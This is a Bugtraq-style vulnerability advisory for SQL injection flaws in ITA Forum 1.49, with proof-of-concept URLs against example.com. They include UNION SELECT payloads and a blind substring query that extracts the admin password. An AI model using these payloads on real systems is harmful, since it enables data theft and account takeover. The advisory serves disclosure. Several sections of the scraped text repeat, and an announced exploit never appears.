ITA Forum Multiple SQL Injection Vulnerabilities
BID:12290
Info
ITA Forum Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 12290 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Rush Security Team <www.rst.void.ru>. |
| Vulnerable: |
ITA Forum ITA Forum 1.49 |
| Not Vulnerable: | |
Discussion
ITA Forum Multiple SQL Injection Vulnerabilities
ITA Forum is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing ro properly sanitize user-supplied input before being used in SQL queries.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities reportedly affect ITA Forum 1.49; earlier versions may also be affected.
ITA Forum is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing ro properly sanitize user-supplied input before being used in SQL queries.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities reportedly affect ITA Forum 1.49; earlier versions may also be affected.
Exploit / POC
ITA Forum Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concepts were supplied by the discoverer of this vulnerability:
http://www.example.com/showuser.php?uid=x'[SQL_CODE_HERE]
http://www.example.com/showforum.php?fid=666'[SQL_CODE_HERE]
http://www.example.com/showthread.php?fid=[such_forum_ID]&tid=666'[SQL_CODE_HERE]
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8%23
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8/*
http://www.example.com/adduser.php?user_pass1=ghc4ever&user_pass2=ghc4ever&[email protected]&Submit=true&user_login=admin'%20AND%20substring(user_pass,[POS],1)=[CHAR]/*
The discoverer of this vulnerability has supplied the following exploit for 'showuser.php' and 'adduser.php':
No exploit is required. The following proof of concepts were supplied by the discoverer of this vulnerability:
http://www.example.com/showuser.php?uid=x'[SQL_CODE_HERE]
http://www.example.com/showforum.php?fid=666'[SQL_CODE_HERE]
http://www.example.com/showthread.php?fid=[such_forum_ID]&tid=666'[SQL_CODE_HERE]
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8%23
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8/*
http://www.example.com/adduser.php?user_pass1=ghc4ever&user_pass2=ghc4ever&[email protected]&Submit=true&user_login=admin'%20AND%20substring(user_pass,[POS],1)=[CHAR]/*
The discoverer of this vulnerability has supplied the following exploit for 'showuser.php' and 'adduser.php':
Solution / Fix
ITA Forum Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.